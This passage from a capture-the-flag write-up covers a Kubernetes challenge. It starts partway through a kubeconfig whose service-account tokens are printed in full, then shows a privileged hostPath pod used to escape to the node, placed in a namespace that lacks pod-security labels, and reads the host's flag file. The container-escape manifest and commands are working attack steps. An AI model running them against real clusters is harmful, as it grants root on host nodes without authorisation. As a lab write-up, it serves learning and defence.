JzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6YXBwbGljYXRpb25zOnJlc3RyaWN0ZWQtdmlld2VyIn0.Kq83s1lTYxWfJVMDxOuAQr5l5Ca5SSjSTaNuuOuk-SVolizCa38ud_HuvsaB_s36iNm31rcY8LFYqSdX8G5nZBIPhMyVBaAJchI4JVeG0Z8C4Xhhefcg9FtDrIFHgE6MnzWSnCCHw60boH8Sof65kx0R1IUPDSS3qOif4jon2caEYvFsGeDeCtOtnWdv-XqkKPF0APs-KA1yGad1yK9MOzidvJzog3v4D6pwpdD1jgKbu9TDXZu5s_hNfb9-ZmTjV7cxfaJvwLR1Ux0biwIKe3uG30Bd2lrBMpUteiQNtgQSkBEX17-TPOgtal8Xg8-QCZ-L8IRRaEVdiJXdkgmuWw
- name: pod-executer
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MTM3LCJpYXQiOjE3MTc2OTExMzcsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiYTNjOGNlNzYtZGJiMi00ODNlLWIyYWQtYTk2MDE1YmMyNzI2Iiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJhcHBsaWNhdGlvbnMiLCJub2RlIjp7Im5hbWUiOiJoYWNrLW1lLW0wMiIsInVpZCI6IjRhZjIxMmVlLTU0MDMtNDE4OS1iZTdiLWE5NWE0MTZkMzE0NyJ9LCJwb2QiOnsibmFtZSI6Im9wZW5zc2gtc2VydmVyLTZkNGI4NWY5NzkteGhubXQiLCJ1aWQiOiI0OWNhZDk0ZC1mMDBkLTQxMmUtODNlMi1jMWEyY2JmNmNiZmUifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1leGVjdXRlciIsInVpZCI6IjFiYzVhNTk0LWI1ZWEtNDI2My1hZDQzLWU2NDg5N2RkZTEzMSJ9LCJ3YXJuYWZ0ZXIiOjE3MTc2OTQ3NDR9LCJuYmYiOjE3MTc2OTExMzcsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDphcHBsaWNhdGlvbnM6cG9kLWV4ZWN1dGVyIn0.KCJXe0l8NpouCpCsKIIzkGYL1kZKtqbOrkTu4BBfHR2c94pgIBBD3TzwylOhMDZLw1acMWGZmAlpsNFUIxIh_EapbarXyIEisAPnyqZlyuGnPQbOBCpMvyXom8RmVOpF2fqqPyHrPaHb_DpIBAnbU03nVh9CzqXeYM84stuh6juP1W5BE1xL7ggQeZOvlZTMExcHkzpNmBtC9h7RAXU9-U-rGNnXNiw9HSdOBE1hk-fJVeKH8qZzdgr62D-HJYir1wk7685PJ9w38CLi2nAKdyDhV3MNyNH2XaZKn8MFXM-bAFqfXxwQ3MFQe8uB41JAD3Gj4zCrrUN5Nm0BsF1CUQ
- name: pod-creator
user:
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IktKMUxyYkZRRW95Yi1CYVpFaDY3dldNbkhlNXRrVzRvaU5FNUV5UmhHUjAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzQ5MjI3MjE2LCJpYXQiOjE3MTc2OTEyMTYsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwianRpIjoiY2YzMDNkNjEtZDI1Yy00ZGRkLTlkMzMtNWNhNWM0MzBhZWUxIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0Iiwibm9kZSI6eyJuYW1lIjoiaGFjay1tZS1tMDIiLCJ1aWQiOiI0YWYyMTJlZS01NDAzLTQxODktYmU3Yi1hOTVhNDE2ZDMxNDcifSwicG9kIjp7Im5hbWUiOiJ0aGUtcHJpbmNlc3MtaXMtaW4tYW5vdGhlci1uYW1lc3BhY2UiLCJ1aWQiOiIyZGVkM2Q2Zi0xMjBhLTQ2ZmEtODYxMS1mZjYyOWZmNTdlMjIifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6InBvZC1jcmVhdG9yIiwidWlkIjoiZmI4ZWU2NTUtYzIwMS00ZTUxLTk0YjAtMjE5MDdiZGIyOWI4In0sIndhcm5hZnRlciI6MTcxNzY5NDgyM30sIm5iZiI6MTcxNzY5MTIxNiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6cG9kLWNyZWF0b3IifQ.eocZ2wPoF64CbkXIW7TRQIRpsUwP0QMfQLMixuJJDPPuq62b1JWZrmIEIZM8_di1HES1xmeuS7xCc6YaOSK-SQ94APP5cb_CUzYzzQGjn4PyVmMPSzYVYUZJI3oj2hEb4-6V8LdfnaOg8QO79uU5NdAmMDENiR3Qt-Atz4YOpWM3cngfFqiPwIGXKxHB5tjqK87CcpK2XSc8g-cm4Fe5y9XF-ZEQSZY-CmS1MSURptFVkTFXZG5M5Gru7ORWvIJ-HMDewgG96vcgE6llLmACH5W-zzgEMEpFR-EW5VYjmwbX_70oZRs1Br6ggvJMrd0_mG6mtM_IsGFlNeN544WmSQ
Let’s check the permissions:
kubectl auth can-i --list
Unsurprisingly, we are now allowed to create pods!
Resources Non-Resource URLs Resource Names Verbs
pods [] [] [create get list]
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods/log [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
To escape from within kubernetes containers, we need to deploy a new pod that deploys a privileged container with the host filesystem mounted into it:
apiVersion: v1
kind: Pod
metadata:
name: ubuntu
labels:
app: ubuntu
spec:
# Node that the container must run on
nodeName: hack-me
containers:
- image: ubuntu
command:
- "sleep"
- "3600"
imagePullPolicy: IfNotPresent
name: ubuntu
securityContext:
allowPrivilegeEscalation: true
privileged: true
runAsUser: 0 # run as root
volumeMounts:
- mountPath: /host
name: host-volume
restartPolicy: Never
hostIPC: true # Use the host's ipc namespace
hostNetwork: true # Use the host's network namespace
hostPID: true # Use the host's pid namespace
volumes:
- name: host-volume
hostPath:
path: /
We try to create the pod using kubectl
, but it fails:
kubectl apply -f pod.yaml
This is the error we get:
Error from server (Forbidden): error when creating "pod.yaml": pods "ubuntu" is forbidden: violates PodSecurity "baseline:latest": host namespaces (hostNetwork=true, hostPID=true, hostIPC=true), hostPath volumes (volume "host-volume"), privileged (container "ubuntu" must not set securityContext.privileged=true)
This tells us that the pod security admission labels have been set on the namespace that we are trying to deploy our pod into. Luckly, we can list all namespace labels as the restricted-viewer
user.
kubectl get ns -o yaml
As we can see, the only namespace that has no pod-security.kubernetes.io
label set is test
:
apiVersion: v1
items:
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:59:42Z"
labels:
kubernetes.io/metadata.name: applications
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: applications
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:58:05Z"
labels:
kubernetes.io/metadata.name: default
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
- apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
kubernetes.io/metadata.name: ingress-nginx
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: ingress-nginx
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:59:41Z"
labels:
kubernetes.io/metadata.name: jobs
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: jobs
- apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2024-06-06T13:58:05Z"
labels:
kubernetes.io/metadata.name: kube-node-lease
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: kube-node-lease
- apiVersion: v1
kind: Namespace
metadata:
labels:
kubernetes.io/metadata.name: kube-public
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: kube-public
- apiVersion: v1
kind: Namespace
metadata:
labels:
kubernetes.io/metadata.name: kube-system
pod-security.kubernetes.io/enforce: baseline
pod-security.kubernetes.io/enforce-version: latest
name: kube-system
- apiVersion: v1
kind: Namespace
metadata:
labels:
kubernetes.io/metadata.name: test
name: test
kind: List
metadata:
resourceVersion: ""
Therefore, creating our privileged pod succeeds if we deploy it into the test
namespace:
kubectl apply -f pod.yaml -n test
After successfully creating the pod, we can then exec
into it:
kubectl exec -it -n test ubuntu -- bash
We can now successfully read the flag!
root@hack-me:~# ls /host/root/
flag.txt
root@hack-me:~# cat /host/root/flag.txt
K8S-CTF-FLAG-9942f87de3d211328c5d206be2be7090
It’s very rare to see a CTF challenge about kubernetes, so when I saw that RedGuard had one for the Area41 conference, I immediately had to try and solve it!
I first heard about the challenge from this linkedin post, as sadly I was not able to attend the conference.
All in all, it took me about 3 hours to solve the challenge. I really liked the difficulty level and that there basically was no guessing needed to be able to proceed to the next step in the chain to get the flag.